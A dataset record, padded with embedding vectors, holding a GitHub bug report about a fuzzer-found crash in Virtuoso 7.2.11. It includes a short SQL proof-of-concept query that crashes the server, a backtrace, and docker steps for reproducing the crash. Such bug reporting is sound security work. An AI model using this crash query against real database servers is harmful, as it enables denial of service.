-0.012171212583780289, -0.0113304378464818, -0.008367708884179592, 0.02128627710044384, 0.0009942492470145226, 0.0009909129003062844, 0.02653110772371292, -0.012938586063683033, 0.011450548656284809, -0.013772687874734402, -0.015040522441267967, 0.023141318932175636, -0.030321266502141953, 0.007500242907553911, 0.01880398951470852, -0.007767155300825834, -0.0038235224783420563, 0.011644060723483562, 0.01054304651916027, 0.020965982228517532, -0.0004725186445284635, -0.0074068233370780945, -0.005214804317802191, -0.0059221223928034306, 0.01590798795223236, 0.010903378017246723, 0.007900611497461796, 0.01197102852165699, 0.00699978182092309, -0.013205498456954956, 0.00736011378467083, 0.0016181573737412691, 0.020605649799108505, -0.005972168408334255, -0.016401777043938637, 0.016455158591270447, 0.01536081824451685, -0.007126565556973219, -0.010576410219073296, -0.014279821887612343, -0.012738402001559734, -0.020805833861231804, 0.008047414012253284, -0.018870718777179718, -0.023528343066573143, -0.008941570296883583, 0.010409589856863022, -0.006979763507843018, 0.0040503982454538345, -0.013225517235696316, 0.010836649686098099, 0.011697443202137947, -0.02379525452852249, 0.005034638103097677, -0.008187542669475079, -0.00020279099408071488, 0.013532467186450958, -0.0076070078648626804, 0.032563332468271255, 0.014666845090687275, 0.012104484252631664, 0.01389279868453741, 0.001693226513452828, 0.013058696873486042, 0.0027892361395061016, 0.013612540438771248, 0.005274859257042408, -0.01065648440271616, 0.002265420276671648, 0.013045351020991802, 0.014159711077809334, -0.013946181163191795, -0.0007640371914021671, 0.023541687056422234, 0.010809958912432194, 0.01266500074416399, 0.027198389172554016, -0.009008298628032207, 0.003596646711230278, -0.008728040382266045, 0.0016748763155192137, -0.0002900588733609766, -0.020592303946614265, 0.000949207809753716, -0.02813258394598961, 0.0018450330244377255, 0.016655344516038895, 0.045054841786623, 0.00788726657629013, 0.005595154594630003, -0.0034765361342579126, -0.011724133975803852, -0.02123289369046688, -0.0304547231644392, 0.0024872913490980864, 0.0027808952145278454, 0.00638254638761282, 0.01588129810988903, -0.010836649686098099, 0.012304669246077538, -0.004554195329546928, 0.01011598575860262, -0.0040036882273852825, -0.004630933050066233, -0.000235008163144812, 0.02541007660329342, -0.001417138846591115, -0.02663787268102169, -0.011183636263012886, 0.0009909129003062844, -0.01401290949434042, -0.0008849819423630834, -0.005808684509247541, 0.012471489608287811, -0.011123580858111382, 0.0048678177408874035, -0.01728258840739727, 0.006599413231015205, 0.010776594281196594, 0.010990124195814133, -0.01840362139046192, 0.0047143432311713696, 0.01256490871310234, 0.015507619827985764, 0.008467800915241241, 0.005354933440685272, -0.007346768397837877, 0.024676065891981125, 0.012918568216264248, -0.006329163908958435, 0.0034731996711343527, 0.02380860038101673, 0.002278765896335244, -0.01187093649059534, -0.004887836053967476, -0.0031712548807263374, -0.008734713308513165, 0.004437421448528767, -0.0076470449566841125, 0.0009391985950060189, 0.008808114565908909, -0.012324687093496323, -0.003960315138101578, 0.00028943331562913954, -0.018270164728164673, -0.0076470449566841125, 0.020872561261057854, -0.010162695311009884, -0.014413278549909592, 0.0024339088704437017, 0.01869722455739975, -0.011483913287520409, 0.009055008180439472, 0.024435844272375107, 0.007827211171388626, 0.01750946417450905, 0.03053479641675949, 0.0036200014874339104, -0.002760876901447773, -0.010763249360024929, -0.0005509242182597518, 0.009115063585340977, -0.024636030197143555, 0.018150053918361664, 0.005628518760204315, -0.017616229131817818, -0.01589464209973812, 0.0003419817076064646, -0.0021469779312610626, 0.004287282936275005, -0.004997937474399805, 0.004394047893583775, 0.012931913137435913, -0.027331845834851265, -0.02815927565097809, -0.019524654373526573, -0.00025023051421158016, -0.002647439017891884, 0.027518684044480324, -0.013852762058377266, -0.014520043507218361, -0.008521183393895626, -0.016855528578162193, -0.009615524671971798, 0.0009592170245014131, 0.006886343937367201, -0.0032563332933932543, -0.0042038727551698685, -0.021806756034493446, -0.02256745658814907, 0.011810881085693836, 0.004817771725356579, 0.008027395233511925, -0.001030115643516183, -0.014186402782797813, 0.0036366835702210665, 0.0039269509725272655, -0.0069397264160215855, 0.012304669246077538, 0.0011902631958946586, 0.020245317369699478, 0.012544889934360981, -0.0016840514726936817, -0.016548579558730125, 0.0025840471498668194, 0.007026473060250282, 0.01881733536720276, 0.0061990441754460335, -0.006252426654100418, 0.017776375636458397, 0.003244655905291438, -0.003134554484859109, -0.005761974956840277, -0.0009183460497297347, 0.023688489571213722, 0.01339233759790659, -0.013519121333956718, -0.012184558436274529, -0.0070598372258245945, 0.003760130610316992, -0.0020235308911651373, 0.01580122299492359, 0.008187542669475079, -0.0026357616297900677, 0.004851135890930891, 0.021059401333332062, -0.026304231956601143, -0.0056552099995315075, 0.056585460901260376, -0.0021469779312610626, -0.014279821887612343, -0.012624964118003845, 0.043239835649728775, 0.0014905398711562157, -0.001718249637633562, -0.0019217703957110643, -0.00992247462272644, 0.0002266671508550644, -0.004260591696947813, 0.0200851708650589, -0.012271304614841938, -0.0035365913063287735, 0.027265118435025215, -0.01752281002700329, -0.01730928011238575, -0.027678832411766052, -0.005905440542846918, -0.00699978182092309, -0.015454237349331379, -0.00866798497736454, -0.015507619827985764, 0.011503931134939194, -0.01848369464278221, -0.004227227531373501, 0.006619431544095278, 0.022167088463902473, -0.01879064366221428, -0.005565126892179251, -0.031335532665252686, -0.0014029591111466289, 0.012131175957620144, 0.005918785929679871, -0.005828702822327614, 0.003026121063157916, -0.00026941485702991486, 0.0120577747002244, -0.01256490871310234, 0.01277176570147276, 0.0033430797047913074, -0.008294307626783848, 0.006345846224576235, -0.003686729818582535, -0.000563435722142458, -0.009782345034182072, 0.0019000837346538901, 0.005812020972371101, -0.0001376267900923267, 0.006526011973619461, -0.013799379579722881, 0.001993503188714385, -0.01617490127682686, -0.0001423186040483415, 0.008114141412079334, -0.001995171420276165, -0.007920630276203156, 0.04006357491016388, -0.019778219982981682, -0.00942201353609562, -0.028292730450630188, 0.005358269438147545, 0.026958169415593147 ]
null
null
null
null
null
null
null
null
null
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. It can also be reproduced in the beta docker image. ```SQL CREATE TABLE v0 ( v1 CHAR(1) NULL , v2 CHAR(1) NULL , v3 INT NULL ) ; SELECT 2 FROM v0 WHERE 2 OR ST_Contains () ; ``` backtrace: ```c #0 0x6dea98 (sql_tree_hash_1+0x38) #1 0x6df00a (sqlo_df_elt+0x3a) #2 0x6dfd37 (sqlo_df+0x37) #3 0x78cf77 (sqlo_geo_f_solve+0x67) #4 0x78d503 (sqlo_solve+0x23) #5 0x6f538e (sqlo_col_inverse+0x3e) #6 0x6f63fc (sqlo_tb_col_preds+0x34c) #7 0x70193e (sqlo_place_table+0x104e) #8 0x70967b (sqlo_try+0xdb) #9 0x70ac5c (sqlo_layout_1+0x94c) #10 0x6eadab (sqlo_layout+0x5fb) #11 0x6edb6f (sqlo_place_dt_leaf+0xfdf) #12 0x6edfb0 (sqlo_place_dt_set+0xd0) #13 0x6ef3bc (sqlo_place_dt+0xec) #14 0x701485 (sqlo_place_table+0xb95) #15 0x70967b (sqlo_try+0xdb) #16 0x70ac5c (sqlo_layout_1+0x94c) #17 0x6eadab (sqlo_layout+0x5fb) #18 0x70eb45 (sqlo_top_2+0x335) #19 0x70e5db (sqlo_top_1+0x26b) #20 0x70ffa6 (sqlo_top_select+0x156) #21 0x6b9b6f (sql_stmt_comp+0x8bf) #22 0x6bc9d2 (sql_compile_1+0x1a62) #23 0x7cba60 (stmt_set_query+0x340) #24 0x7cd952 (sf_sql_execute+0x922) #25 0x7cecde (sf_sql_execute_w+0x17e) #26 0x7d799d (sf_sql_execute_wrapper+0x3d) #27 0xe214bc (future_wrapper+0x3fc) #28 0xe28dbe (_thread_boot+0x11e) #29 0x7ff0e4a34609 (start_thread+0xd9) #30 0x7ff0e4804133 (clone+0x43) ``` ways to reproduce (write poc to the file /tmp/test.sql first): ```bash # remove the old one docker container rm virtdb_test -f # start virtuoso through docker docker run --name virtdb_test -itd --env DBA_PASSWORD=dba pkleef/virtuoso-opensource-7 # wait the server starting sleep 10 # check whether the simple query works echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba # run the poc cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba ```
Fuzzer: Virtuoso 7.2.11 crashed at `sql_tree_hash_1`
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1209/comments
0
2023-12-12T16:55:36
2023-12-15T14:14:11Z
https://github.com/openlink/virtuoso-opensource/issues/1209
2,038,189,894
1,209
false
This is a GitHub Issue repo:virtuoso-opensource owner:openlink Title : Fuzzer: Virtuoso 7.2.11 crashed at `sql_tree_hash_1` Issue date: --- start body --- The PoC is generated by my DBMS fuzzer. It can also be reproduced in the beta docker image. ```SQL CREATE TABLE v0 ( v1 CHAR(1) NULL , v2 CHAR(1) NULL , v3 INT NULL ) ; SELECT 2 FROM v0 WHERE 2 OR ST_Contains () ; ``` backtrace: ```c #0 0x6dea98 (sql_tree_hash_1+0x38) #1 0x6df00a (sqlo_df_elt+0x3a) #2 0x6dfd37 (sqlo_df+0x37) #3 0x78cf77 (sqlo_geo_f_solve+0x67) #4 0x78d503 (sqlo_solve+0x23) #5 0x6f538e (sqlo_col_inverse+0x3e) #6 0x6f63fc (sqlo_tb_col_preds+0x34c) #7 0x70193e (sqlo_place_table+0x104e) #8 0x70967b (sqlo_try+0xdb) #9 0x70ac5c (sqlo_layout_1+0x94c) #10 0x6eadab (sqlo_layout+0x5fb) #11 0x6edb6f (sqlo_place_dt_leaf+0xfdf) #12 0x6edfb0 (sqlo_place_dt_set+0xd0) #13 0x6ef3bc (sqlo_place_dt+0xec) #14 0x701485 (sqlo_place_table+0xb95) #15 0x70967b (sqlo_try+0xdb) #16 0x70ac5c (sqlo_layout_1+0x94c) #17 0x6eadab (sqlo_layout+0x5fb) #18 0x70eb45 (sqlo_top_2+0x335) #19 0x70e5db (sqlo_top_1+0x26b) #20 0x70ffa6 (sqlo_top_select+0x156) #21 0x6b9b6f (sql_stmt_comp+0x8bf) #22 0x6bc9d2 (sql_compile_1+0x1a62) #23 0x7cba60 (stmt_set_query+0x340) #24 0x7cd952 (sf_sql_execute+0x922) #25 0x7cecde (sf_sql_execute_w+0x17e) #26 0x7d799d (sf_sql_execute_wrapper+0x3d) #27 0xe214bc (future_wrapper+0x3fc) #28 0xe28dbe (_thread_boot+0x11e) #29 0x7ff0e4a34609 (start_thread+0xd9) #30 0x7ff0e4804133 (clone+0x43) ``` ways to reproduce (write poc to the file /tmp/test.sql first): ```bash # remove the old one docker container rm virtdb_test -f # start virtuoso through docker docker run --name virtdb_test -itd --env DBA_PASSWORD=dba pkleef/virtuoso-opensource-7 # wait the server starting sleep 10 # check whether the simple query works echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba # run the poc cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba ``` --- end body ---
2,007
[ -0.019210156053304672, -0.004577135667204857, -0.00987410731613636, -0.013400574214756489, 0.05435848608613014, 0.019951803609728813, -0.016607113182544708, 0.033214226365089417, -0.010543045587837696, 0.014214932918548584, -0.0016241742996498942, -0.001452395343221724, 0.008572586812078953, -0.0014278555754572153, 0.003980908542871475, 0.029636863619089127, -0.024939754977822304, 0.010281287133693695, -0.03522104024887085, -0.05351504310965538, -0.007641890086233616, 0.024198107421398163, -0.03309788927435875, 0.046738408505916595, 0.0013478738255798817, 0.005980451591312885, 0.0007089289138093591, -0.009990444406867027, -0.010404895059764385, 0.015356490388512611, -0.005907740909606218, 0.04100881144404411, 0.012353540398180485, 0.004180862568318844, 0.04929782450199127, 0.0034392140805721283, 0.03993269428610802, 0.031120160594582558, -0.005860479082912207, 0.04551687091588974, 0.015414658933877945, -0.01974821463227272, -0.007780040148645639, 0.04688383266329765, 0.00038127650623209774, 0.01851213350892067, 0.0017623245948925614, -0.01145192887634039, -0.04333554953336716, 0.020824331790208817, 0.0026902942918241024, -0.009605078026652336, -0.00945238582789898, -0.05121738836169243, -0.014098596759140491, -0.045284196734428406, 0.018672097474336624, 0.03379591181874275, 0.01974821463227272, 0.02318015694618225, -0.026379426941275597, -0.023049278184771538, 0.013109731487929821, 0.0375186987221241, 0.0015232881996780634, 0.04830896109342575, -0.0024812512565404177, 0.005057026166468859, -0.033359650522470474, 0.01470936555415392, -0.009103374555706978, -0.04580771550536156, 0.027062905952334404, 0.03301063925027847, 0.018032243475317955, -0.010906598530709743, -0.0016405341448262334, -0.0044826120138168335, -0.025157887488603592, -0.0026012237649410963, -0.03248712047934532, 0.03935100883245468, -0.05200266093015671, 0.03827488794922829, 0.019980888813734055, -0.01663619838654995, -0.048541635274887085, -0.0789346918463707, -0.02502700872719288, -0.019282866269350052, -0.003610084066167474, 0.012040885165333748, -0.0017268781084567308, 0.030276717618107796, 0.0025066998787224293, 0.01224447414278984, -0.05005401745438576, -0.0025485085789114237, -0.06113512068986893, 0.05494017153978348, -0.020053599029779434, -0.01900656521320343, 0.02562323585152626, 0.014302185736596584, 0.02460528537631035, 0.021289680153131485, -0.00927060842514038, 0.007794582284986973, 0.03388316556811333, 0.12797075510025024, 0.027091991156339645, -0.014396710321307182, -0.012404438108205795, -0.005227896384894848, -0.005715057719498873, -0.03769320622086525, 0.044469837099313736, -0.011691873893141747, -0.06119328737258911, -0.028822503983974457, -0.040543463081121445, -0.02888067252933979, -0.015603707171976566, -0.029069719836115837, -0.033679574728012085, 0.030712980777025223, -0.0318472683429718, -0.017537809908390045, -0.015443743206560612, -0.012680738233029842, 0.00996136013418436, -0.05339870601892471, -0.006205854471772909, -0.01394590362906456, 0.03225444629788399, -0.005384224001318216, -0.01833762787282467, 0.020853416994214058, 0.0066275764256715775, 0.006373089272528887, -0.06910420954227448, -0.024547116830945015, 0.009757770225405693, -0.0037555054295808077, 0.02127513848245144, 0.008216303773224354, -0.035977233201265335, -0.01747964136302471, 0.003279250580817461, 0.01646169275045395, 0.012789804488420486, -0.012695280835032463, 0.036646172404289246, 0.02248213440179825, 0.0038354871794581413, -0.005849572364240885, 0.03263254091143608, 0.027659133076667786, 0.015880007296800613, -0.024474406614899635, -0.042346686124801636, -0.03871115297079086, -0.004359004087746143, -0.053078778088092804, -0.007216532714664936, 0.015414658933877945, 0.011342862620949745, 0.05063570290803909, 0.0026557566598057747, 0.006496697198599577, -0.004369910340756178, 0.019980888813734055, 0.010477605275809765, 0.03312697634100914, -0.036442581564188004, 0.02976774238049984, 0.014665739610791206, 0.013647790066897869, -0.017581436783075333, -0.02715015970170498, -0.024343527853488922, 0.00889978464692831, -0.005042484030127525, -0.010019528679549694, 0.03347598761320114, 0.017319679260253906, 0.04572046175599098, 0.0070783826522529125, 0.018003158271312714, 0.009903191588819027, 0.02396543323993683, -0.006616669707000256, 0.00782366655766964, -0.013466013595461845, -0.007620076648890972, -0.006322191562503576, -0.03016038052737713, -0.01178639754652977, 0.0021049734205007553, -0.03606448695063591, 0.026234004646539688, -0.04010719805955887, -0.03568638861179352, -0.014229475520551205, -0.007590992376208305, 0.05403856188058853, 0.00812178011983633, 0.0538058876991272, 0.027295580133795738, -0.002443077974021435, 0.009852293878793716, 0.010128594934940338, 0.017421472817659378, 0.02816810831427574, -0.045138776302337646, 0.011262880638241768, -0.022205835208296776, 0.008965224027633667, -0.0284880343824625, 0.013196984305977821, 0.026670269668102264, -0.002172230975702405, -0.0005335144232958555, -0.00022244916181080043, -0.07096560299396515, -0.034174010157585144, 0.004340826068073511, -0.007590992376208305, -0.039583683013916016, 0.012113595381379128, 0.03167276084423065, -0.012113595381379128, -0.009168813936412334, 0.004831623286008835, 0.030422138050198555, -0.008558044210076332, -0.015429201535880566, -0.01854121685028076, 0.027906350791454315, -0.014454878866672516, 0.048832476139068604, 0.02616129443049431, -0.022074954584240913, -0.0050861104391515255, 0.010114052332937717, 0.05819761008024216, -0.03248712047934532, -0.0031865446362644434, -0.022104039788246155, 0.0024321714881807566, -0.013742313720285892, -0.033359650522470474, 0.011175627820193768, -0.0061040595173835754, 0.026423051953315735, 0.0032138109672814608, 0.020620742812752724, 0.014702094718813896, -0.010644840076565742, -0.025855910032987595, 0.003095656167715788, -0.004620762076228857, -0.013240610249340534, 0.014229475520551205, 0.014098596759140491, 0.006809352897107601, -0.03513379022479057, -0.006198583636432886, -0.028793420642614365, -0.005358775611966848, 0.04112514853477478, 0.013422387652099133, -0.02460528537631035, -0.04255027696490288, 0.009343319572508335, -0.0403398722410202, -0.015254695899784565, 0.00783820915967226, 0.013240610249340534, -0.022874772548675537, 0.003659163834527135, -0.007205625995993614, -0.006863886024802923, 0.03978727012872696, 0.04025261849164963, 0.011590078473091125, 0.019515540450811386, -0.012644383125007153, -0.01992272026836872, -0.055231016129255295, -0.04031078889966011, -0.01596726104617119, -0.03641349822282791, -0.010223118588328362, -0.015661874786019325, 0.0261903777718544, 0.02152235433459282, 0.018075868487358093, -0.001100657507777214, 0.004449892323464155, -0.03475569561123848, -0.028197193518280983, 0.00957599375396967, 0.04173591732978821, -0.07637527585029602, -0.015036563389003277, -0.010979308746755123, 0.02413993887603283, -0.02053348906338215, -0.02927331067621708, -0.0005757774924859405, -0.011619162745773792, -0.0005812307936139405, -0.008143593557178974, -0.015152900479733944, -0.007845479995012283, 0.003653710475191474, -0.026626642793416977, -0.024227190762758255, -0.008572586812078953, -0.05776134505867958, -0.013037020340561867, -0.09818846732378006, 0.014840245246887207, 0.07916736602783203, -0.0154873700812459, -0.027513712644577026, 0.027600964531302452, -0.07381585985422134, 0.01015767827630043, 0.02922968380153179, -0.05357321351766586, -0.013153357431292534, 0.00399908609688282, -0.01564733311533928, -0.06119328737258911, -0.005322420038282871, -0.01925378106534481, 0.0014714818680658937, 0.0052751582115888596, -0.009808667935431004, 0.05188632383942604, -0.024692539125680923, -0.0035828175023198128, 0.018744807690382004, 0.007329234387725592, 0.042986541986465454, -0.021827738732099533, 0.032690711319446564, 0.007649160921573639, 0.0008334459271281958, 0.049705006182193756, -0.03734419494867325, 0.013778669759631157, 0.05002493038773537, -0.036297161132097244, -0.0108847850933671, -0.010572129860520363, 0.018715722486376762, 0.0049334182403981686, 0.016476234421133995, -0.013429658487439156, 0.00265939231030643, 0.025332393124699593, -0.010012257844209671, -0.005671431310474873, 0.03347598761320114, -0.00346466270275414, 0.006656660698354244, -0.008754363283514977, -0.05348595976829529, 0.03234170004725456, 0.0012578943278640509, -0.016359897330403328, -0.028749793767929077, -0.04880339279770851, 0.03865298628807068, 0.0006975678843446076, 0.0032247176859527826, 0.017566895112395287, -0.008558044210076332, -0.02421264909207821, 0.03490111604332924, -0.017828652635216713, 0.02091158553957939, 0.00595500273630023, 0.022772977128624916, 0.02006814070045948, -0.039554595947265625, -0.01985001005232334, -0.007227439433336258, 0.028967926278710365, -0.04734918102622032, -0.08335549384355545, 0.0026230369694530964, -0.014273101463913918, 0.0039590951055288315, 0.008216303773224354, 0.008078154176473618, -0.04449892044067383, 0.01175004243850708, 0.007511010859161615, -0.003284703940153122, -0.0033428724855184555, -0.0034773871302604675, 0.026553932577371597, 0.0033446901943534613, 0.016621656715869904, 0.00803452730178833, 0.013705958612263203, 0.016868872568011284, -0.02986953780055046, -0.014127681031823158, 0.018075868487358093, 0.0260158721357584, 0.03490111604332924, 0.00909610278904438, -0.015109274536371231, -0.015909092500805855, 0.009590535424649715, -0.04900698363780975, 0.015458285808563232, -0.0016405341448262334, 0.025157887488603592, 0.015356490388512611, 0.02095521055161953, -0.00244671362452209, -0.005940460599958897, 0.02166777476668358, -0.011408302001655102, 0.02633580006659031, -0.017421472817659378, 0.0129206832498312, 0.013276966288685799, -0.02031535655260086, -0.039903607219457626, -0.00045716826571151614, 0.002188590820878744, 0.011633705347776413, -0.023092905059456825, -0.02088250033557415, 0.030800234526395798, -0.014258559793233871, 0.006598492152988911, -0.016476234421133995, -0.0024721622467041016, -0.025666862726211548, -0.0030302165541797876, -0.011066561564803123, 0.004777090158313513, 0.0074273934587836266, 0.025826824828982353, -0.0009852293878793716, 0.0016596207860857248, -0.007932732813060284, 0.02969503216445446, -0.015734586864709854, 0.01705791987478733, 0.04700016975402832, 0.010441250167787075, 0.001167006092146039, 0.03687884658575058, 0.007329234387725592, -0.009016121737658978, 0.027281038463115692, 0.04816354066133499, 0.02421264909207821, -0.016519861295819283, 0.009401488117873669, -0.03036396950483322, 0.023092905059456825, -0.006205854471772909, -0.02283114567399025, 0.004431714303791523, -0.022962026298046112, 0.013829566538333893, 0.0438881516456604, 0.009721415117383003, -0.021827738732099533, -0.0005957729299552739, -0.011335591785609722, 0.008681652136147022, 0.010150407440960407, 0.01861392892897129, 0.0410669781267643, 0.008703465573489666, -0.0029175151139497757, -0.021042464300990105, -0.02322378382086754, 0.017348762601614, 0.016345355659723282, -0.007460113149136305, -0.06293834745883942, -0.031585510820150375, -0.004137236159294844, -0.00583139481022954, -0.02722286991775036, -0.008507146500051022, 0.017857737839221954, -0.004526238422840834, 0.016679825261235237, -0.03722785785794258, -0.0056350757367908955, -0.010143136605620384, -0.016752535477280617, -0.020344441756606102, 0.02290385775268078, 0.0321962796151638, 0.003810038324445486, -0.030247632414102554, 0.010579400695860386, -0.06270567327737808, 0.004998857621103525, -0.03757686913013458, -0.017436016350984573, 0.0008916144142858684, 0.02184228040277958, -0.006565772462636232, 0.020199021324515343, 0.010732092894613743, -0.01582183875143528, -0.03193452209234238, -0.023979974910616875, 0.031236497685313225, 0.031556423753499985, 0.023020192980766296, 0.020271731540560722, -0.008289014920592308, 0.0063658179715275764, -0.03557005152106285, -0.0067548202350735664, 0.0155746228992939, -0.003430125303566456, 0.047203756868839264, -0.007758227176964283, 0.007583721540868282, 0.01051396131515503, 0.030538475140929222, -0.00693659670650959, -0.00693659670650959, 0.026553932577371597, 0.022540302947163582, -0.045924052596092224, -0.023660046979784966, 0.015443743206560612, 0.015603707171976566, -0.010586671531200409, 0.012448064051568508, 0.02742645889520645, -0.02307836152613163, 0.022642098367214203, 0.004108151886612177, 0.003737327642738819, -0.008274472318589687, 0.01777048408985138, -0.0027611872646957636, 0.00033765012631192803, 0.0110592907294631, 0.026132209226489067, 0.012426251545548439, -0.0065039680339396, -0.0024776156060397625, -0.00010253338405163959, 0.005304242484271526, -0.007438300177454948, 0.018323086202144623, -0.008645297028124332, 0.007889105938374996, -0.02502700872719288, -0.0011433750623837113, 0.018977481871843338, 0.006093152798712254, -0.03458118811249733, -0.03815855085849762, -0.0066348472610116005, -0.000500340189319104, -0.027353748679161072, -0.015240153297781944, -0.01288432814180851, -0.0032465308904647827, 0.03673342242836952, -0.022554846480488777, 0.0006375815719366074, 0.024081770330667496, 0.003001132281497121, -0.008681652136147022, 0.014716637320816517, 0.015880007296800613, 0.014818431809544563, -0.0029429637361317873, -0.01585092395544052, -0.009416029788553715, -0.00638036010786891, -0.016083598136901855, 0.039263755083084106, 0.0066093988716602325, 0.006911147851496935, 0.006871156860142946, 0.0029847724363207817, 0.01383683830499649, -0.03478477895259857, -0.01387319341301918, 0.0013942267978563905, -0.016999751329421997, -0.017494184896349907, 0.026742979884147644, -0.011517368257045746, -0.02828444540500641, -0.008201762102544308, 0.03001495823264122, 0.0001888204860733822, 0.009568721987307072, 0.0375186987221241, -0.01649077609181404, 0.03455210477113724, 0.0006830257480032742, 0.04604038596153259, 0.012338998727500439, -0.026495764032006264, 0.02697565406560898, 0.03440668433904648, -0.04313196241855621, 0.0026448501739650965, 0.009052476845681667, 0.010564858093857765, 0.042986541986465454, -0.02952052652835846, 0.003915468696504831, -0.018497591838240623, -0.018177663907408714, -0.03347598761320114, 0.00689297029748559, 0.010252202861011028, -0.03306880593299866, -0.02905517816543579, 0.0456622913479805, 0.030073126778006554, 0.0005148823256604373, 0.011815481819212437, -0.011640976183116436, 0.017683232203125954, 0.013778669759631157, 0.0222930870950222, -0.002134057693183422, -0.026103125885128975, -0.01361143495887518, 0.014665739610791206, 0.004733463749289513, 0.025637777522206306, 0.05220625177025795, -0.0045116962864995, 0.014251288957893848, 0.04269569739699364, 0.01314608659595251, 0.02648122049868107, -0.010281287133693695, 0.036966096609830856, 0.04857071861624718, -0.033185143023729324, -0.0018550306558609009, -0.029360562562942505, -0.021609608083963394, -0.005944096017628908, 0.00851441826671362, 0.00851441826671362, 0.009321506135165691, -0.02162414975464344, -0.006016806699335575, 0.015603707171976566, 0.01624356023967266, 0.003133829217404127, -0.001196090248413384, -0.007583721540868282, -0.007391038350760937, -0.002430353779345751, -0.03757686913013458, -0.0025994060561060905, 0.026466678828001022, -0.019515540450811386, 0.02098429575562477, -0.02579774148762226, 0.006569407880306244, -0.011284694075584412, -0.007049298379570246, -0.026393968611955643, 0.0015351037727668881, -0.024794334545731544, 0.029811369255185127, 0.002252212492749095, -0.023907264694571495, -0.008368996903300285, -0.006794810760766268, 0.034174010157585144, 0.024692539125680923, 0.025855910032987595, -0.0029247861821204424, 0.03280704841017723, -0.012964310124516487, -0.014593028463423252, -0.0036228084936738014, -0.008441707119345665, 0.026234004646539688, 0.02056257426738739, 0.007074746768921614, 0.01641806587576866, 0.003984543960541487, -0.005067932885140181, 0.0018886593170464039, 0.0017277869628742337, 0.0003387862234376371, -0.0033428724855184555, -0.008521689102053642, -0.009895920753479004, 0.00011770037235692143, -0.01481116097420454, -0.03493019938468933, 0.018279459327459335, 0.015414658933877945, -0.028618915006518364, 0.013349676504731178, -0.016548944637179375, 0.0014460331294685602, -0.029142431914806366, -0.029985874891281128, -0.0019013836281374097, 0.0026175836101174355, 0.025754114612936974, 0.037780456244945526, -0.004748005885630846, 0.013044292107224464, -0.009714143350720406, -0.027295580133795738, 0.035744559019804, 0.0012297190260142088, -0.04752368479967117, 0.024328986182808876, 0.022642098367214203, -0.012113595381379128, 0.008478062227368355, 0.026277631521224976, 0.020082684233784676, 0.026219462975859642, -0.014360354281961918, 0.00293751060962677, -0.004842529539018869, 0.01922469772398472, 0.028895214200019836, -0.010484877042472363, 0.0042135827243328094, 0.021813197061419487, 0.03440668433904648, 0.010259473696351051, 0.021711401641368866, -0.022772977128624916, -0.017145173624157906, -0.012855243869125843, 0.0006294016493484378, -0.024619828909635544, 0.013342405669391155, -0.012957039289176464, 0.020897042006254196, 0.030538475140929222, 0.003004767931997776, 0.006820259615778923, 0.025739572942256927, -0.0159236341714859, 0.004638940095901489, -0.01893385499715805, 0.020053599029779434, 0.00877617672085762, 0.009306964464485645, -0.01109564583748579, 0.0154873700812459, 0.00812178011983633, 0.013124273158609867, -0.02456166036427021, -0.0006562136695720255, 0.007969087921082973, 0.017959531396627426, 0.017683232203125954, -0.033708661794662476, -0.029113346710801125, -0.027164701372385025, 0.014665739610791206, -0.01745055802166462, -0.023660046979784966, 0.0076273479498922825, 0.002926603890955448, 0.01638898253440857, 0.00863802619278431, -0.004802539013326168, -0.026873858645558357, 0.024227190762758255, 0.013037020340561867, -0.003930010832846165, -0.031032908707857132, 0.014534859918057919, 0.015167443081736565, -0.006827530451118946, -0.032399870455265045, 0.021289680153131485, 0.008718008175492287, -0.022176750004291534, -0.010215846821665764, 0.0067548202350735664, -0.01935557648539543, -0.003517378121614456, 0.020518947392702103, -0.020751621574163437, 0.00794727448374033, -0.002235852647572756, -0.008848886936903, -0.002848440082743764, 0.022976567968726158, 0.028371699154376984, -0.0020195385441184044, -0.00642398651689291, -0.02152235433459282, -0.0016768894856795669, 0.025317851454019547, -0.0134514719247818, 0.02715015970170498, -0.007216532714664936, -0.00957599375396967, -0.015341948717832565, 0.0045625935308635235, 0.01656348817050457, -0.011408302001655102, 0.01878843456506729, -0.01865755394101143, 0.008150864392518997, 0.009263337589800358, -0.0017332403222098947, -0.011582807637751102, -0.03216719627380371, 0.02693202719092369, -0.004588042385876179, -0.024009058251976967, -0.005922283045947552, 0.02080979011952877, -0.005893198773264885, -0.014476691372692585, 0.03519195690751076, 0.011764584109187126, -0.010579400695860386, -0.03199268877506256, -0.0284880343824625, 0.004820716567337513, -0.020024515688419342, 0.002632125746458769, 0.04982134327292442, 0.013502368703484535, 0.00889978464692831, 0.02382001094520092, 0.010957496240735054, 0.021609608083963394, 0.0012751631438732147, -0.0013269694754853845, 0.024474406614899635, -0.0024049049243330956, 0.014905684627592564, -0.004926146939396858, -0.014207662083208561, -0.01720334216952324, 0.02952052652835846, 0.027906350791454315, -0.014694823883473873, -0.014614841900765896, 0.0017441469244658947, -0.02555052563548088, -0.007583721540868282, -0.018352169543504715, 0.013676874339580536, 0.005009764339774847, -0.00863802619278431, -0.0032319887541234493, -0.0108847850933671, -0.018250374123454094, 0.015458285808563232, 0.0021358756348490715, 0.0050861104391515255, -0.007750955875962973, -0.016112681478261948, 0.001558734686113894, 0.0196464192122221, -0.024765249341726303, 0.0038027672562748194, -0.025405103340744972, -0.017072461545467377, -0.010942953638732433, -0.0014978395774960518, -0.009030663408339024, -0.03949642926454544, 0.0021976795978844166, 0.015501911751925945, 0.019733672961592674, -0.0005176090053282678, 0.009895920753479004, -0.011684602126479149, -0.01606905460357666, -0.013233339414000511, -0.030422138050198555, -0.01369868777692318, -0.01267346739768982, 0.013582350686192513, -0.005151549819856882, 0.033388733863830566, 0.022307628765702248, 0.0019068369874730706, 0.029287852346897125, 0.0378677099943161, 0.027411917224526405, 0.023092905059456825, -0.06817351281642914, -0.041183315217494965, 0.0001805269275791943, -0.004729828331619501, -0.030451223254203796, -0.016258101910352707, 0.015545538626611233, 0.01922469772398472, 0.022147666662931442, 0.013175170868635178, 0.005075203720480204, 0.013066104613244534, -0.01463665533810854, 0.0046716597862541676, 0.012578943744301796, -0.018206749111413956, 0.01383683830499649, 0.0005580543074756861, -0.020431693643331528, 0.008550773374736309, 0.008296285755932331, 0.029113346710801125, -0.006613034289330244, 0.033185143023729324, -0.022845689207315445, -0.028691625222563744, -0.033534154295921326, -0.023732759058475494, 0.0017186981858685613, 